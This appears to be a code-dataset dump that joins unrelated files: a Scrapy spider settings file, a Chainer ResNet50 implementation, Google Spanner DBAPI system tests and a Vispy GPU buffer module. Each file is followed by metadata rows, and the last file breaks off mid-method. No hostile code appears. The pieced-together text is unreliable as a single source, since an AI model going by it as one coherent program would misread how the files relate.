!/usr/bin/env python3 Copyright (c) 2017-2020 The Vadercoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. The node will send us invs for other blocks. Ignore them. last block in valid range first block outside of the 288+2 limitmust relay address with NODE_NETWORK_LIMITED connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible node2 must remain at height 0 now connect also to node 1 (non pruned) sync must be possible disconnect all peers mine 10 blocks on node 0 (pruned node) connect node1 (non pruned) with node0 (pruned) and check if the can sync sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED) | 1,149 | en | 0.794128 |
# -*- coding: utf-8 -*-
BOT_NAME = 'BeiKeZuFangSpider'
SPIDER_MODULES = ['BeiKeZuFangSpider.spiders']
NEWSPIDER_MODULE = 'BeiKeZuFangSpider.spiders'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
# COOKIES_ENABLED = False
# KAFKA配置
# KAFKA的访问ip或者端口(默认localhost:9092)
KAFKA_IP_PORT = ["localhost:9092"]
# Kafka的Topic name
KAFKA_TOPIC_NAME = "BeiKeZuFang"
# MONGODB配置
MONGODB_HOST = "127.0.0.1"
MONGODB_PORT = 27017
MONGODB_USER = ""
MONGODB_PASS = ""
MONGODB_DB_NAME = "BeiKeData"
MONGODB_COL_NAME = "ZuFang"
# CSV导出
CSV_EXPORTER = True
CSV_DEFAULT_PATH = "./ExportData/"
# Disable Telnet Console (enabled by default)
TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'BeiKeZuFangSpider.middlewares.BeikezufangspiderSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
'scrapy.downloadermiddleware.useragent.UserAgentMiddleware': None,
'BeiKeZuFangSpider.middlewares.BeiKeZuFangScrapyUserAgentMiddleware': 400,
}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'BeiKeZuFangSpider.pipelines.BeiKeZuFangSpiderPipeline': 1,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| BeiKeZuFangSpider/settings.py | 3,112 | -*- coding: utf-8 -*- Obey robots.txt rules Configure maximum concurrent requests performed by Scrapy (default: 16) CONCURRENT_REQUESTS = 32 Configure a delay for requests for the same website (default: 0) See https://doc.scrapy.org/en/latest/topics/settings.htmldownload-delay See also autothrottle settings and docs DOWNLOAD_DELAY = 3 The download delay setting will honor only one of: CONCURRENT_REQUESTS_PER_DOMAIN = 16 CONCURRENT_REQUESTS_PER_IP = 16 Disable cookies (enabled by default) COOKIES_ENABLED = False KAFKA配置 KAFKA的访问ip或者端口(默认localhost:9092) Kafka的Topic name MONGODB配置 CSV导出 Disable Telnet Console (enabled by default) Override the default request headers: DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } Enable or disable spider middlewares See https://doc.scrapy.org/en/latest/topics/spider-middleware.html SPIDER_MIDDLEWARES = { 'BeiKeZuFangSpider.middlewares.BeikezufangspiderSpiderMiddleware': 543, } Enable or disable downloader middlewares See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html Enable or disable extensions See https://doc.scrapy.org/en/latest/topics/extensions.html EXTENSIONS = { 'scrapy.extensions.telnet.TelnetConsole': None, } Configure item pipelines See https://doc.scrapy.org/en/latest/topics/item-pipeline.html Enable and configure the AutoThrottle extension (disabled by default) See https://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True The initial download delay AUTOTHROTTLE_START_DELAY = 5 The maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 60 The average number of requests Scrapy should be sending in parallel to each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = False Enable and configure HTTP caching (disabled by default) See https://doc.scrapy.org/en/latest/topics/downloader-middleware.htmlhttpcache-middleware-settings HTTPCACHE_ENABLED = True HTTPCACHE_EXPIRATION_SECS = 0 HTTPCACHE_DIR = 'httpcache' HTTPCACHE_IGNORE_HTTP_CODES = [] HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' | 2,237 | en | 0.564759 |
# Original author: yasunorikudo
# (https://github.com/yasunorikudo/chainer-ResNet)
import chainer
import chainer.functions as F
from chainer import initializers
import chainer.links as L
class BottleNeckA(chainer.Chain):
def __init__(self, in_size, ch, out_size, stride=2):
super(BottleNeckA, self).__init__()
initialW = initializers.HeNormal()
with self.init_scope():
self.conv1 = L.Convolution2D(
in_size, ch, 1, stride, 0, initialW=initialW, nobias=True)
self.bn1 = L.BatchNormalization(ch)
self.conv2 = L.Convolution2D(
ch, ch, 3, 1, 1, initialW=initialW, nobias=True)
self.bn2 = L.BatchNormalization(ch)
self.conv3 = L.Convolution2D(
ch, out_size, 1, 1, 0, initialW=initialW, nobias=True)
self.bn3 = L.BatchNormalization(out_size)
self.conv4 = L.Convolution2D(
in_size, out_size, 1, stride, 0,
initialW=initialW, nobias=True)
self.bn4 = L.BatchNormalization(out_size)
def __call__(self, x):
h1 = F.relu(self.bn1(self.conv1(x)))
h1 = F.relu(self.bn2(self.conv2(h1)))
h1 = self.bn3(self.conv3(h1))
h2 = self.bn4(self.conv4(x))
return F.relu(h1 + h2)
class BottleNeckB(chainer.Chain):
def __init__(self, in_size, ch):
super(BottleNeckB, self).__init__()
initialW = initializers.HeNormal()
with self.init_scope():
self.conv1 = L.Convolution2D(
in_size, ch, 1, 1, 0, initialW=initialW, nobias=True)
self.bn1 = L.BatchNormalization(ch)
self.conv2 = L.Convolution2D(
ch, ch, 3, 1, 1, initialW=initialW, nobias=True)
self.bn2 = L.BatchNormalization(ch)
self.conv3 = L.Convolution2D(
ch, in_size, 1, 1, 0, initialW=initialW, nobias=True)
self.bn3 = L.BatchNormalization(in_size)
def __call__(self, x):
h = F.relu(self.bn1(self.conv1(x)))
h = F.relu(self.bn2(self.conv2(h)))
h = self.bn3(self.conv3(h))
return F.relu(h + x)
class Block(chainer.ChainList):
def __init__(self, layer, in_size, ch, out_size, stride=2):
super(Block, self).__init__()
self.add_link(BottleNeckA(in_size, ch, out_size, stride))
for i in range(layer - 1):
self.add_link(BottleNeckB(out_size, ch))
self._layer = layer
def __call__(self, x):
for f in self.children():
x = f(x)
return x
@property
def layer(self):
return self._layer
class ResNet50(chainer.Chain):
def __init__(self, class_num, insize, class_weight=None, caffemodel_path=None):
assert (insize % 32 == 0), "'insize' should be divisible by 32."
super(ResNet50, self).__init__()
with self.init_scope():
self.conv1 = L.Convolution2D(
3, 64, 7, 2, 3, initialW=initializers.HeNormal())
self.bn1 = L.BatchNormalization(64)
self.res2 = Block(3, 64, 64, 256, 1)
self.res3 = Block(4, 256, 128, 512)
self.res4 = Block(6, 512, 256, 1024)
self.res5 = Block(3, 1024, 512, 2048)
self.fc = L.Linear(2048, class_num)
if caffemodel_path is not None:
# Load pre-trained weights from caffemodel
self._load_pretrained_weights(caffemodel_path)
self._class_num = class_num
self._insize = insize
self._class_weight = class_weight
def forward(self, x, compute_cam=False):
h = self.bn1(self.conv1(x))
h = F.max_pooling_2d(F.relu(h), 3, stride=2)
h = self.res2(h)
h = self.res3(h)
h = self.res4(h)
h = self.res5(h)
cam_features = h.data
h = F.average_pooling_2d(h, self._insize//32, stride=1)
h = self.fc(h)
if compute_cam:
cam_weights = self.fc.W.data
return h, cam_features, cam_weights
return h
def __call__(self, x, t):
h = self.forward(x)
loss = F.softmax_cross_entropy(h, t, class_weight=self._class_weight)
chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)
return loss
@property
def insize(self):
return self._insize
@property
def class_num(self):
return self._class_num
# Functions to load weights from pre-trained ResNet50 caffemodel
# Reference: https://github.com/chainer/chainer/blob/master/chainer/links/model/vision/resnet.py
def _load_weights_conv_bn(self, src, dst_conv, dst_bn, bname, cname):
src_conv = getattr(src, 'res{}_branch{}'.format(bname, cname))
src_bn = getattr(src, 'bn{}_branch{}'.format(bname, cname))
src_scale = getattr(src, 'scale{}_branch{}'.format(bname, cname))
dst_conv.W.data[:] = src_conv.W.data
dst_bn.avg_mean[:] = src_bn.avg_mean
dst_bn.avg_var[:] = src_bn.avg_var
dst_bn.gamma.data[:] = src_scale.W.data
dst_bn.beta.data[:] = src_scale.bias.b.data
def _load_weights_bottleneckA(self, dst, src, name):
self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')
self._load_weights_conv_bn(src, dst.conv4, dst.bn4, name, '1')
def _load_weights_bottleneckB(self, dst, src, name):
self._load_weights_conv_bn(src, dst.conv1, dst.bn1, name, '2a')
self._load_weights_conv_bn(src, dst.conv2, dst.bn2, name, '2b')
self._load_weights_conv_bn(src, dst.conv3, dst.bn3, name, '2c')
def _load_weights_block(self, dst, src, names):
for i, (layers, name) in enumerate(zip(dst.children(), names)):
if i ==0:
self._load_weights_bottleneckA(layers, src, name)
else:
self._load_weights_bottleneckB(layers, src, name)
def _load_pretrained_weights(self, caffemodel_path):
# As CaffeFunction uses shortcut symbols,
# CaffeFunction is imported here.
from chainer.links.caffe.caffe_function import CaffeFunction
src = CaffeFunction(caffemodel_path)
self.conv1.W.data[:] = src.conv1.W.data
self.conv1.b.data[:] = src.conv1.b.data
self.bn1.avg_mean[:] = src.bn_conv1.avg_mean
self.bn1.avg_var[:] = src.bn_conv1.avg_var
self.bn1.gamma.data[:] = src.scale_conv1.W.data
self.bn1.beta.data[:] = src.scale_conv1.bias.b.data
self._load_weights_block(self.res2, src, ['2a', '2b', '2c'])
self._load_weights_block(self.res3, src, ['3a', '3b', '3c', '3d'])
self._load_weights_block(self.res4, src, ['4a', '4b', '4c', '4d', '4e', '4f'])
self._load_weights_block(self.res5, src, ['5a', '5b', '5c'])
| src/models/resnet50.py | 6,020 | Original author: yasunorikudo (https://github.com/yasunorikudo/chainer-ResNet) Load pre-trained weights from caffemodel Functions to load weights from pre-trained ResNet50 caffemodel Reference: https://github.com/chainer/chainer/blob/master/chainer/links/model/vision/resnet.py As CaffeFunction uses shortcut symbols, CaffeFunction is imported here. | 349 | en | 0.781427 |
# Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import pickle
import pytest
from google.cloud import spanner_v1
from google.cloud.spanner_dbapi.connection import Connection
from . import _helpers
DATABASE_NAME = "dbapi-txn"
DDL_STATEMENTS = (
"""CREATE TABLE contacts (
contact_id INT64,
first_name STRING(1024),
last_name STRING(1024),
email STRING(1024)
)
PRIMARY KEY (contact_id)""",
)
@pytest.fixture(scope="session")
def raw_database(shared_instance, database_operation_timeout):
databse_id = _helpers.unique_id("dbapi-txn")
pool = spanner_v1.BurstyPool(labels={"testcase": "database_api"})
database = shared_instance.database(
databse_id, ddl_statements=DDL_STATEMENTS, pool=pool,
)
op = database.create()
op.result(database_operation_timeout) # raises on failure / timeout.
yield database
database.drop()
def clear_table(transaction):
transaction.execute_update("DELETE FROM contacts WHERE true")
@pytest.fixture(scope="function")
def dbapi_database(raw_database):
raw_database.run_in_transaction(clear_table)
yield raw_database
raw_database.run_in_transaction(clear_table)
def test_commit(shared_instance, dbapi_database):
"""Test committing a transaction with several statements."""
want_row = (
1,
"updated-first-name",
"last-name",
"test.email_updated@domen.ru",
)
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
# execute several DML statements within one transaction
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (1, 'first-name', 'last-name', 'test.email@domen.ru')
"""
)
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
cursor.execute(
"""
UPDATE contacts
SET email = 'test.email_updated@domen.ru'
WHERE email = 'test.email@domen.ru'
"""
)
conn.commit()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_rollback(shared_instance, dbapi_database):
"""Test rollbacking a transaction with several statements."""
want_row = (2, "first-name", "last-name", "test.email@domen.ru")
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (2, 'first-name', 'last-name', 'test.email@domen.ru')
"""
)
conn.commit()
# execute several DMLs with one transaction
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
cursor.execute(
"""
UPDATE contacts
SET email = 'test.email_updated@domen.ru'
WHERE email = 'test.email@domen.ru'
"""
)
conn.rollback()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_autocommit_mode_change(shared_instance, dbapi_database):
"""Test auto committing a transaction on `autocommit` mode change."""
want_row = (
2,
"updated-first-name",
"last-name",
"test.email@domen.ru",
)
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (2, 'first-name', 'last-name', 'test.email@domen.ru')
"""
)
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
conn.autocommit = True
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_rollback_on_connection_closing(shared_instance, dbapi_database):
"""
When closing a connection all the pending transactions
must be rollbacked. Testing if it's working this way.
"""
want_row = (1, "first-name", "last-name", "test.email@domen.ru")
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (1, 'first-name', 'last-name', 'test.email@domen.ru')
"""
)
conn.commit()
cursor.execute(
"""
UPDATE contacts
SET first_name = 'updated-first-name'
WHERE first_name = 'first-name'
"""
)
conn.close()
# connect again, as the previous connection is no-op after closing
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
# read the resulting data from the database
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
conn.commit()
assert got_rows == [want_row]
cursor.close()
conn.close()
def test_results_checksum(shared_instance, dbapi_database):
"""Test that results checksum is calculated properly."""
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES
(1, 'first-name', 'last-name', 'test.email@domen.ru'),
(2, 'first-name2', 'last-name2', 'test.email2@domen.ru')
"""
)
assert len(conn._statements) == 1
conn.commit()
cursor.execute("SELECT * FROM contacts")
got_rows = cursor.fetchall()
assert len(conn._statements) == 1
conn.commit()
checksum = hashlib.sha256()
checksum.update(pickle.dumps(got_rows[0]))
checksum.update(pickle.dumps(got_rows[1]))
assert cursor._checksum.checksum.digest() == checksum.digest()
def test_execute_many(shared_instance, dbapi_database):
# connect to the test database
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
row_data = [
(1, "first-name", "last-name", "test.email@example.com"),
(2, "first-name2", "last-name2", "test.email2@example.com"),
]
cursor.executemany(
"""
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES (%s, %s, %s, %s)
""",
row_data,
)
conn.commit()
cursor.executemany(
"""SELECT * FROM contacts WHERE contact_id = @a1""", ({"a1": 1}, {"a1": 2}),
)
res = cursor.fetchall()
conn.commit()
assert len(res) == len(row_data)
for found, expected in zip(res, row_data):
assert found[0] == expected[0]
# checking that execute() and executemany()
# results are not mixed together
cursor.execute(
"""
SELECT * FROM contacts WHERE contact_id = 1
""",
)
res = cursor.fetchone()
conn.commit()
assert res[0] == 1
conn.close()
def test_DDL_autocommit(shared_instance, dbapi_database):
"""Check that DDLs in autocommit mode are immediately executed."""
conn = Connection(shared_instance, dbapi_database)
conn.autocommit = True
cur = conn.cursor()
cur.execute(
"""
CREATE TABLE Singers (
SingerId INT64 NOT NULL,
Name STRING(1024),
) PRIMARY KEY (SingerId)
"""
)
conn.close()
# if previous DDL wasn't committed, the next DROP TABLE
# statement will fail with a ProgrammingError
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute("DROP TABLE Singers")
conn.commit()
def test_DDL_commit(shared_instance, dbapi_database):
"""Check that DDLs in commit mode are executed on calling `commit()`."""
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute(
"""
CREATE TABLE Singers (
SingerId INT64 NOT NULL,
Name STRING(1024),
) PRIMARY KEY (SingerId)
"""
)
conn.commit()
conn.close()
# if previous DDL wasn't committed, the next DROP TABLE
# statement will fail with a ProgrammingError
conn = Connection(shared_instance, dbapi_database)
cur = conn.cursor()
cur.execute("DROP TABLE Singers")
conn.commit()
def test_ping(shared_instance, dbapi_database):
"""Check connection validation method."""
conn = Connection(shared_instance, dbapi_database)
conn.validate()
conn.close()
def test_update_non_autocommit(shared_instance, dbapi_database):
setup_rows = """
INSERT INTO contacts (contact_id, first_name, last_name, email)
VALUES
(1, 'first-name', 'last-name', 'get@domen.ru'),
(2, 'first-name', 'last-name', 'get@domen.ru'),
(3, 'first-name', 'last-name', 'ignore@domen.ru')
"""
conn = Connection(shared_instance, dbapi_database)
cursor = conn.cursor()
cursor.execute(setup_rows)
conn.commit()
cursor.execute(
"UPDATE contacts SET first_name='changed' WHERE email='get@domen.ru'"
)
conn.commit()
assert cursor.rowcount == 2
| tests/system/test_dbapi.py | 9,907 | Check that DDLs in autocommit mode are immediately executed.
Check that DDLs in commit mode are executed on calling `commit()`.
Test auto committing a transaction on `autocommit` mode change.
Test committing a transaction with several statements.
Check connection validation method.
Test that results checksum is calculated properly.
Test rollbacking a transaction with several statements.
When closing a connection all the pending transactions
must be rollbacked. Testing if it's working this way.
Copyright 2021 Google LLC All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. raises on failure / timeout. connect to the test database execute several DML statements within one transaction read the resulting data from the database connect to the test database execute several DMLs with one transaction read the resulting data from the database connect to the test database read the resulting data from the database connect to the test database connect again, as the previous connection is no-op after closing read the resulting data from the database connect to the test database checking that execute() and executemany() results are not mixed together if previous DDL wasn't committed, the next DROP TABLE statement will fail with a ProgrammingError if previous DDL wasn't committed, the next DROP TABLE statement will fail with a ProgrammingError | 1,841 | en | 0.891344 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# -----------------------------------------------------------------------------
import numpy as np
from os import path as op
from traceback import extract_stack, format_list
import weakref
from . globject import GLObject
from ..util import logger
from ..ext.six import string_types
# ------------------------------------------------------------ Buffer class ---
class Buffer(GLObject):
""" Generic GPU buffer.
A generic buffer is an interface used to upload data to a GPU array buffer
(ARRAY_BUFFER or ELEMENT_ARRAY_BUFFER). It keeps track of
buffer size but does not have any CPU storage. You can consider it as
write-only.
The `set_data` is a deferred operation: you can call it even if an OpenGL
context is not available. The `update` function is responsible to upload
pending data to GPU memory and requires an active GL context.
The Buffer class only deals with data in terms of bytes; it is not
aware of data type or element size.
Parameters
----------
data : ndarray | None
Buffer data.
nbytes : int | None
Buffer byte size.
"""
def __init__(self, data=None, nbytes=None):
GLObject.__init__(self)
self._views = [] # Views on this buffer (stored using weakrefs)
self._valid = True # To invalidate buffer views
self._nbytes = 0 # Bytesize in bytes, set in resize_bytes()
# Set data
if data is not None:
if nbytes is not None:
raise ValueError("Cannot specify both data and nbytes.")
self.set_data(data, copy=False)
elif nbytes is not None:
self.resize_bytes(nbytes)
@property
def nbytes(self):
""" Buffer size in bytes """
return self._nbytes
def set_subdata(self, data, offset=0, copy=False):
""" Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
"""
data = np.array(data, copy=copy)
nbytes = data.nbytes
if offset < 0:
raise ValueError("Offset must be positive")
elif (offset + nbytes) > self._nbytes:
raise ValueError("Data does not fit into buffer")
# If the whole buffer is to be written, we clear any pending data
# (because they will be overwritten anyway)
if nbytes == self._nbytes and offset == 0:
self._glir.command('SIZE', self._id, nbytes)
self._glir.command('DATA', self._id, offset, data)
def set_data(self, data, copy=False):
""" Set data in the buffer (deferred operation).
This completely resets the size and contents of the buffer.
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
"""
data = np.array(data, copy=copy)
nbytes = data.nbytes
if nbytes != self._nbytes:
self.resize_bytes(nbytes)
else:
# Use SIZE to discard any previous data setting
self._glir.command('SIZE', self._id, nbytes)
if nbytes: # Only set data if there *is* data
self._glir.command('DATA', self._id, 0, data)
def resize_bytes(self, size):
""" Resize this buffer (deferred operation).
Parameters
----------
size : int
New buffer size in bytes.
"""
self._nbytes = size
self._glir.command('SIZE', self._id, size)
# Invalidate any view on this buffer
for view in self._views:
if view() is not None:
view()._valid = False
self._views = []
# -------------------------------------------------------- DataBuffer class ---
class DataBuffer(Buffer):
""" GPU data buffer that is aware of data type and elements size
Parameters
----------
data : ndarray | None
Buffer data.
"""
def __init__(self, data=None):
self._size = 0 # number of elements in buffer, set in resize_bytes()
self._dtype = None
self._stride = 0
self._itemsize = 0
self._last_dim = None
Buffer.__init__(self, data)
def _prepare_data(self, data):
# Can be overrriden by subclasses
if not isinstance(data, np.ndarray):
raise TypeError("DataBuffer data must be numpy array.")
return data
def set_subdata(self, data, offset=0, copy=False, **kwargs):
""" Set a sub-region of the buffer (deferred operation).
Parameters
----------
data : ndarray
Data to be uploaded
offset: int
Offset in buffer where to start copying data (in bytes)
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional keyword arguments.
"""
data = self._prepare_data(data, **kwargs)
offset = offset * self.itemsize
Buffer.set_subdata(self, data=data, offset=offset, copy=copy)
def set_data(self, data, copy=False, **kwargs):
""" Set data (deferred operation)
Parameters
----------
data : ndarray
Data to be uploaded
copy: bool
Since the operation is deferred, data may change before
data is actually uploaded to GPU memory.
Asking explicitly for a copy will prevent this behavior.
**kwargs : dict
Additional arguments.
"""
data = self._prepare_data(data, **kwargs)
self._dtype = data.dtype
self._stride = data.strides[-1]
self._itemsize = self._dtype.itemsize
Buffer.set_data(self, data=data, copy=copy)
@property
def dtype(self):
""" Buffer dtype """
return self._dtype
@property
def offset(self):
""" Buffer offset (in bytes) relative to base """
return 0
@property
def stride(self):
""" Stride of data in memory """
return self._stride
@property
def size(self):
""" Number of elements in the buffer """
return self._size
@property
def itemsize(self):
""" The total number of bytes required to store the array data """
return self._itemsize
@property
def glsl_type(self):
""" GLSL declaration strings required for a variable to hold this data.
"""
if self.dtype is None:
return None
dtshape = self.dtype[0].shape
n = dtshape[0] if dtshape else 1
if n > 1:
dtype = 'vec%d' % n
else:
dtype = 'float' if 'f' in self.dtype[0].base.kind else 'int'
return 'attribute', dtype
def resize_bytes(self, size):
""" Resize the buffer (in-place, deferred operation)
Parameters
----------
size : integer
New buffer size in bytes
Notes
-----
This clears any pending operations.
"""
Buffer.resize_bytes(self, size)
self._size = size // self.itemsize
def __getitem__(self, key):
""" Create a view on this buffer. """
view = DataBufferView(self, key)
self._views.append(weakref.ref(view))
return view
def __setitem__(self, key, data):
""" Set data (deferred operation) """
# Setting a whole field of the buffer: only allowed if we have CPU
# storage. Note this case (key is string) only happen with base buffer
if isinstance(key, string_types):
raise ValueError("Cannot set non-contiguous data on buffer")
# Setting one or several elements
elif isinstance(key, int):
if key < 0:
key += self.size
if key < 0 or key > self.size:
raise IndexError("Buffer assignment index out of range")
start, stop, step = key, key + 1, 1
elif isinstance(key, slice):
start, stop, step = key.indices(self.size)
if stop < start:
start, stop = stop, start
elif key == Ellipsis:
start, stop, step = 0, self.size, 1
else:
raise TypeError("Buffer indices must be integers or strings")
# Contiguous update?
if step != 1:
raise ValueError("Cannot set non-contiguous data on buffer")
# Make sure data is an array
if not isinstance(data, np.ndarray):
data = np.array(data, dtype=self.dtype, copy=False)
# Make sure data is big enough
if data.size < stop - start:
data = np.resize(data, stop - start)
elif data.size > stop - start:
raise ValueError('Data too big to fit GPU data.')
# Set data
offset = start # * self.itemsize
self.set_subdata(data=data, offset=offset, copy=True)
def __repr__(self):
return ("<%s size=%s last_dim=%s>" %
(self.__class__.__name__, self.size, self._last_dim))
class DataBufferView(DataBuffer):
""" View on a sub-region of a DataBuffer.
Parameters
----------
base : DataBuffer
The buffer accessed by this view.
key : str, int, slice, or Ellpsis
The index into the base buffer that defines a sub-region of the buffer
to view. String arguments select a single field from multi-field
dtypes, and other allowed types select a subset of rows.
Notes
-----
It is generally not necessary to instantiate this class manually; use
``base_buffer[key]`` instead.
"""
# Note that this class is a bit evil: it is a subclass of GLObject,
# Buffer and DataBuffer, but any of these __init__'s are not called ...
def __init__(self, base, key):
# Note how this never runs the super's __init__,
# all attributes must thus be set here ...
self._base = base
self._key = key
self._stride = base.stride
if isinstance(key, string_types):
self._dtype = base.dtype[key]
self._offset = base.dtype.fields[key][1]
self._nbytes = base.size * self._dtype.itemsize
self._size = base.size
self._itemsize = self._dtype.itemsize
return
if isinstance(key, int):
if key < 0:
key += base.size
if key < 0 or key > base.size:
raise IndexError("Buffer assignment index out of range")
start, stop, step = key, key + 1, 1
elif isinstance(key, slice):
start, stop, step = key.indices(base.size)
if stop < start:
start, stop = stop, start
elif key == Ellipsis:
start, stop, step = 0, base.size, 1
else:
raise TypeError("Buffer indices must be integers or strings")
if step != 1:
raise ValueError("Cannot access non-contiguous data")
self._itemsize = base.itemsize
self._offset = start * self.itemsize
self._size = stop - start
self._dtype = base.dtype
self._nbytes = self.size * self.itemsize
@property
def glir(self):
return self._base.glir
@property
def id(self):
return self._base.id
@property
def _last_dim(self):
return self._base._last_dim
def set_subdata(self, data, offset=0, copy=False, **kwargs):
raise RuntimeError("Cannot set data on buffer view.")
def set_data(self, data, copy=False, **kwargs):
raise RuntimeError("Cannot set data on buffer view.")
@property
def offset(self):
""" Buffer offset (in bytes) relative to base """
return self._offset
@property
def base(self):
"""Buffer base if this buffer is a view on another buffer. """
return self._base
def resize_bytes(self, size):
raise RuntimeError("Cannot resize buffer view.")
def __getitem__(self, key):
raise RuntimeError("Can only access data from a base buffer")
def __setitem__(self, key, data):
raise RuntimeError("Cannot set data on Buffer view")
def __repr__(self):
return ("<DataBufferView on %r at offset=%d size=%d>" %
(self.base, self.offset, self.size))
# ------------------------------------------------------ VertexBuffer class ---
class VertexBuffer(DataBuffer):
""" Buffer for vertex attribute data
Parameters
----------
data : ndarray
Buffer data (optional)
"""
_GLIR_TYPE = 'VertexBuffer'
def _prepare_data(self, data, convert=False):
# Build a structured view of the data if:
